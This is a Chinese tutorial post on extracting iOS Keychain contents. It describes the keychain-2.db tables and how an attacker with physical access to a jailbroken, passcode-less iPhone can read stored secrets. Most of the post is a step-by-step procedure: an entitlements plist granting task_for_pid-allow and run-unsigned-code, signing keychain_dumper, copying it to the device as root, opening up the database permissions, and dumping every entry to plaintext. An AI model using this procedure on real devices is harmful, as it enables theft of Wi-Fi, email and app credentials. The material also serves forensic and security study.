1、iOS操作系统(包括mac),采用keychain数据库来存储敏感数据(例如wifi热点信息,邮箱信息等),keychain数据库位于iOS系统的/var/Keychains/keychain-2.db下,数据库中的内容是加密的,并且不同应用之间的数据存储是隔离的。
2、当打开这个数据库,会发现如下图中四个表:genp、inet、cert、keys
数据库内数据,大多数是加密的,Keychain的数据库内容使用了设备唯一的硬件密钥进行加密,该硬件密钥无法从设备上导出。因此,存储在Keychain中的数据只能在该台设备上读取,而无法复制到另一台设备上解密后读取。
3、一旦攻击者能够物理接触到没有设置密码的iOS设备时,他就可以通过越狱该设备,运行如keychain_dumper这样的工具,读取到设备所有的Keychain条目,获取里面存储的明文信息。具体方法是通过ssh让mac连接iPhone,使用keychain_dumper,导出Keychain
4、开始操作
4.1 下载Keychain-Dumper
4.2 编译签名
1、$security find-identity -v -p codesigning 列出钥匙串里可签名的证书
2、新建ent.plist文件放到Keychain-Dumper目录下
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>platform-application</key>
<true/>
<key>com.apple.springboard.debugapplications</key>
<true/>
<key>run-unsigned-code</key>
<true/>
<key>get-task-allow</key>
<true/>
<key>task_for_pid-allow</key>
<true/>
</dict>
</plist>
3、签名编译
CER="iPhone Developer: heavenxxoo.com (3PQG28U86G)" make codesign
4、复制到设备bin目录下并赋予权限
scp keychain_dumper root@192.168.0.168:/bin/
chmod +x /bin/keychain_dumper
5、keychain也要赋予读写权限
Heaven:/private/var/Keychains root# chmod +r keychain-2.db
6、解密keychain
cd /private/var/Keychains
/bin/keychain_dumper > keychain-export.txt
7、导出keychain-export.txt 文件
好了,可以愉快地开始了~
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
